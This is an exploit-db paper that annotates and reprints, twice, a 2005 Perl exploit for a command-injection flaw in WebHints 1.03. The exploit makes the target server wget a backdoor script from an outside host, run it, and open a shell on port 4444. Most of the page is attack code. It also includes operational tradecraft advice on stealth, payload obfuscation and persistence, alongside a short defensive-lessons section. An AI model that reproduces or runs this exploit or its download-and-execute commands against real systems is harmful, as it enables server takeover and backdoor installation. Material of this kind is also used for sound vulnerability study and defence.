By exploitdb papers bot•June 11, 2005•

papers

WebHints 1.03 Remote Command Execution Explained

What this paper is

This paper details a vulnerability in WebHints version 1.03, a web application that allows for remote command execution on the target server. The exploit, written in Perl, leverages a flaw in how the application handles certain GET requests to execute arbitrary commands. Specifically, it aims to download and execute a backdoor script from a remote server.

Simple technical breakdown

The vulnerability lies in the hints.pl script within WebHints. When a specially crafted GET request is sent, the application doesn't properly sanitize the input. This allows an attacker to inject commands that are then executed by the web server's process.

The exploit works in two main stages:

Download the backdoor: The first request tells the vulnerable server to download a Perl script (alpha.txt) from a specified URL (http://www.khatotarh.com/NeT/alpha.txt) into the /tmp directory.
Execute the backdoor: The second request tells the server to rename the downloaded file to alpha.pl, make it executable, and then run it using Perl. This executed script is designed to open a reverse shell on port 4444.

Complete code and payload walkthrough

Let's break down the Perl script provided in the exploit.

# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke

#!/usr/bin/perl
######################################################################################
#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           #
######################################################################################
#  EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln                               #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)                               #
#Email: Alpha_Programmer@Yahoo.Com                                                   #
#                                                                                    #
#This Xpl Run a backdo0r in Server With 4444 Port.                                   #
#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded               #
######################################################################################
# GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  The-CephaleX  -- Str0ke         #
#And Iranian Security & Technical Sites:                                             #
#                                                                                    #
#         TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG             #
#      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  GrayHatz.NeT      #
######################################################################################

use IO::Socket; # Imports the module for network socket operations.

if (@ARGV < 2) # Checks if fewer than 2 command-line arguments are provided.
{
 print "\n==============================================\n";
 print " \n    WebHints Exploit By Alpha_Programmer \n\n";
 print "      Trap-Set Underground Hacking Team      \n\n";
 print "            Usage: <T4rg3t> <Dir>      \n\n";
 print "==============================================\n\n";
 print "Examples:\n\n";
 print "    Webhints.pl www.Host.com /cgi-bin/ \n";
 exit(); # Exits the script if usage is incorrect.
}

$serv = $ARGV[0]; # Assigns the first command-line argument (target host) to $serv.
$serv =~ s/http:\/\///ge; # Removes "http://" from the target host string for easier socket connection.

$dir = $ARGV[1]; # Assigns the second command-line argument (directory path) to $dir.

$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; # Defines the first command to be executed.
# This command changes the directory to /tmp and then uses wget to download a file named alpha.txt from a remote URL.

$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl"; # Defines the second command to be executed.
# This command changes to /tmp, copies alpha.txt to alpha.pl, makes alpha.pl executable (permissions 777), and then executes it using perl.

$req = "GET $dir"; # Starts building the first HTTP GET request.
$req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n"; # Appends the vulnerable script name, the command to be executed, and HTTP headers.
# The crucial part here is `hints.pl?|$cmde|`. The `|` characters are used as delimiters to inject the command.

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n"; # Attempts to establish a TCP connection to the target server on port 80.

print $sock $req; # Sends the first crafted HTTP request to the server.
print "\nPlease Wait ...\n\n"; # Informs the user that the script is waiting.
sleep(3000); # Pauses execution for 3000 seconds (50 minutes). This is likely to allow the wget command to complete.
close($sock); # Closes the first socket connection.

$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n"; # Attempts to establish a second TCP connection to the target server on port 80.

$req2 = "GET $dir"; # Starts building the second HTTP GET request.
$req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n"; # Appends the vulnerable script name and the second command to be executed.

print $sock2 $req2; # Sends the second crafted HTTP request to the server.

sleep(100); # Pauses execution for 100 seconds. This is to allow the second command (executing the backdoor) to run and potentially establish a reverse shell.

print "\n\n$$$   OK -- Now Try: Nc -v www.Site.com 4444   $$$\n"; # Instructs the user on how to check for the reverse shell.
print "$$  if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP  $$\n"; # Provides a hint about potential failure due to /tmp write permissions.
print "Enjoy ;)";
### EOF ###

# milw0rm.com [2005-06-11]

Mapping list:

#!/usr/bin/perl: Shebang line, indicating the script should be executed with Perl.
use IO::Socket;: Imports the Perl module for network socket programming, essential for making HTTP requests.
if (@ARGV < 2) block: Handles incorrect command-line arguments, printing usage instructions.
$serv = $ARGV[0]; $serv =~ s/http:\/\///ge;: Captures the target hostname from the first argument and cleans it.
$dir = $ARGV[1];: Captures the target directory path from the second argument.
$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";: The first payload. This is a shell command string.
- cd /tmp: Changes the current directory to /tmp. This is a common location for temporary files and often has write permissions for the web server process.
- wget http://www.khatotarh.com/NeT/alpha.txt: Downloads the alpha.txt file from the specified URL. wget is a standard command-line utility for downloading files.
$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl";: The second payload. This is also a shell command string.
- cd /tmp: Changes directory to /tmp.
- cp alpha.txt alpha.pl: Copies the downloaded file alpha.txt to alpha.pl.
- chmod 777 alpha.pl: Sets read, write, and execute permissions for owner, group, and others on alpha.pl. This ensures the script can be executed.
- perl alpha.pl: Executes the alpha.pl script using the Perl interpreter. This is the stage where the backdoor is activated.
$req = "GET $dir"; $req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n";: Constructs the first HTTP GET request. The |$cmde| part injects the first command into the request. The | characters act as delimiters for the vulnerable script to interpret the command.
$sock = IO::Socket::INET->new(...): Creates a socket to connect to the target server on port 80.
print $sock $req;: Sends the first request.
sleep(3000);: A significant delay, intended to allow the wget command to complete its download.
close($sock);: Closes the first connection.
$sock2 = IO::Socket::INET->new(...): Creates a second socket for the second request.
$req2 = "GET $dir"; $req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n";: Constructs the second HTTP GET request, injecting $cmde2.
print $sock2 $req2;: Sends the second request.
sleep(100);: A shorter delay, intended to allow the Perl backdoor script to execute and establish a reverse shell.
print "\n\n$$$ OK -- Now Try: Nc -v www.Site.com 4444 $$$\n";: Provides instructions to the user to check for the reverse shell using netcat (nc) on port 4444.
print "$$ if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP $$\n";: A crucial diagnostic message. If the reverse shell doesn't connect, it suggests the web server process lacked write permissions in /tmp.

Shellcode/Payload Explanation:

The "payload" here isn't traditional shellcode in the sense of raw machine code. Instead, it's a sequence of shell commands embedded within HTTP requests.

Stage 1 (Download): cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt
- Purpose: To retrieve the malicious Perl script from the attacker's controlled server.
- Execution Environment: The web server's process.
- Outcome: alpha.txt is downloaded to /tmp.
Stage 2 (Execute & Backdoor): cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl
- Purpose: To prepare and execute the downloaded script, which then establishes a reverse shell.
- Execution Environment: The web server's process.
- Outcome: The alpha.pl script runs. The content of alpha.pl is not provided in this paper, but based on the exploit's output, it's designed to open a reverse shell on port 4444, connecting back to the attacker.

Practical details for offensive operations teams

Required Access Level: Network access to the target web server. No prior authentication or local access is required if the vulnerability exists.
Lab Preconditions:
- A vulnerable WebHints 1.03 installation.
- A separate attacker-controlled server to host the alpha.txt file (e.g., www.khatotarh.com).
- A listener (e.g., netcat) on the attacker's machine ready to receive the reverse shell on port 4444.
- The attacker's machine needs to be able to reach the target server over HTTP (port 80).
Tooling Assumptions:
- Perl interpreter on the attacker's machine to run the exploit script.
- wget utility on the target server (highly probable on most Linux/Unix systems).
- chmod and perl utilities on the target server.
- netcat (nc) on the attacker's machine for listening.
Execution Pitfalls:
- /tmp Write Permissions: The most significant failure point. If the web server process does not have write permissions in /tmp, the wget command will fail, and subsequent execution will not occur. The exploit explicitly mentions this.
- Firewall Restrictions: Network firewalls between the target and the attacker's listener could block the reverse shell connection on port 4444.
- wget Availability: If wget is not installed on the target server, the first stage will fail.
- URL Accessibility: The attacker's hosting server (www.khatotarh.com) must be accessible from the target server.
- Incorrect Directory Path: The $dir argument must accurately point to the directory containing hints.pl.
- Web Server Configuration: Some web server configurations might prevent the execution of commands via URL parameters, even if the application is vulnerable.
- Long Delays: The sleep(3000) is a very long delay. In a real engagement, this might be adjusted or removed if the download is expected to be faster, or if multiple attempts are needed. However, it's there to ensure the download completes before attempting execution.
Tradecraft Considerations:
- Stealth: The exploit uses standard HTTP GET requests, which might blend in with normal traffic if not carefully monitored. However, the large sleep times and the specific commands executed are indicators.
- Payload Hosting: The attacker needs to ensure their payload hosting server is stable and accessible.
- Reverse Shell Port: Port 4444 is a common choice for reverse shells, but it might be monitored. Consider alternative ports if necessary.
- Payload Obfuscation: The alpha.txt content is unknown. For more advanced operations, this would need to be obfuscated or encrypted.
- Post-Exploitation: Once a reverse shell is obtained, the immediate next step would be privilege escalation and persistence.

Where this was used and when

Vulnerability: WebHints 1.03 Remote Command Execution.
Exploit Publication Date: 2005-06-11.
Context: This exploit targets a specific version of a web application. Such vulnerabilities are typically exploited by attackers shortly after discovery or public disclosure. Given the publication date, this exploit would have been relevant in mid-2005 and onwards. It's likely that WebHints 1.03 was in use on servers around that time. The advisory link points to a SecurityFocus archive from 2004, suggesting the vulnerability was known then.

Defensive lessons for modern teams

Patch Management: Keep all web applications and their dependencies updated to the latest stable versions. WebHints 1.03 is ancient, but the principle applies to any software.
Input Validation and Sanitization: This is the core lesson. Web applications must rigorously validate and sanitize all user-supplied input, especially data passed through URL parameters, POST bodies, or headers, before it's processed or executed. Never trust external input.
Principle of Least Privilege: Ensure the web server process runs with the minimum necessary privileges. It should not have write access to directories like /tmp unless absolutely essential and strictly controlled.
Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including command injection attempts.
Network Segmentation and Monitoring: Segment networks to limit the blast radius of a compromise. Monitor outbound connections from web servers for unusual patterns, such as unexpected connections to external hosts or on non-standard ports.
File Integrity Monitoring: Implement file integrity monitoring on critical directories, including /tmp, to detect unauthorized file creations or modifications.
Secure Coding Practices: Train developers on secure coding practices, emphasizing the dangers of command injection and insecure handling of external data.

ASCII visual (if applicable)

This exploit involves a sequence of network requests and command executions. A simple flow diagram can illustrate this:

+-------------------+     HTTP GET (cmd1)     +-------------------+
| Attacker Machine  | ----------------------> | Target Web Server |
| (Exploit Script)  |                         | (WebHints 1.03)   |
+-------------------+                         +---------+---------+
                                                          |
                                                          | Executes cmd1:
                                                          | cd /tmp; wget ...
                                                          |
                                                          v
                                                  +-------------------+
                                                  | Remote Payload    |
                                                  | Server (alpha.txt)|
                                                  +-------------------+
                                                          ^
                                                          | Downloads
                                                          |
+-------------------+     HTTP GET (cmd2)     +---------+---------+
| Attacker Machine  | ----------------------> | Target Web Server |
| (Listener on 4444)|                         | (WebHints 1.03)   |
+-------------------+                         +---------+---------+
                                                          |
                                                          | Executes cmd2:
                                                          | cd /tmp; cp ...;
                                                          | chmod ...; perl ...
                                                          |
                                                          v
                                                  +-------------------+
                                                  | Reverse Shell     |
                                                  | (Port 4444)       |
                                                  +-------------------+

Source references

Paper ID: 1039
Paper Title: Webhints 1.03 - Remote Command Execution (Perl)
Author: Alpha_Programmer
Published: 2005-06-11
Keywords: CGI, webapps
Paper URL: https://www.exploit-db.com/papers/1039
Raw URL: https://www.exploit-db.com/raw/1039
Related Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded (Mentioned in the exploit's header)

Original Exploit-DB Content (Verbatim)

# This exploit uses a backdoor that isn't located on this server.
# $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
# change for your own needs. /str0ke

#!/usr/bin/perl
######################################################################################
#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           #
######################################################################################
#  EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln                               #
#                                                                                    #
#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)                               #
#Email: Alpha_Programmer@Yahoo.Com                                                   #
#                                                                                    #
#This Xpl Run a backdo0r in Server With 4444 Port.                                   #
#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded               #
######################################################################################
# GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  The-CephaleX  -- Str0ke         #
#And Iranian Security & Technical Sites:                                             #
#                                                                                    #
#         TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG             #
#      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  GrayHatz.NeT      #
######################################################################################

use IO::Socket;

if (@ARGV < 2)
{
 print "\n==============================================\n";
 print " \n    WebHints Exploit By Alpha_Programmer \n\n";
 print "      Trap-Set Underground Hacking Team      \n\n";
 print "            Usage: <T4rg3t> <Dir>      \n\n";
 print "==============================================\n\n";
 print "Examples:\n\n";
 print "    Webhints.pl www.Host.com /cgi-bin/ \n";
 exit();
}


$serv = $ARGV[0];
$serv =~ s/http:\/\///ge;

$dir = $ARGV[1];

$cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt";
$cmde2 = "cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl";

$req = "GET $dir";
$req .= "hints.pl?|$cmde| HTTP/1.0\n\n\n\n";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";

print $sock $req;
print "\nPlease Wait ...\n\n";
sleep(3000);
close($sock);

$sock2 = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>80) or die " (-) - C4n't C0nn3ct To The S3rver\n";


$req2 = "GET $dir";
$req2 .= "hints.pl?|$cmde2| HTTP/1.0\n\n\n\n";

print $sock2 $req2;

sleep(100);

print "\n\n$$$   OK -- Now Try: Nc -v www.Site.com 4444   $$$\n";
print "$$  if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP  $$\n";
print "Enjoy ;)";
### EOF ###

# milw0rm.com [2005-06-11]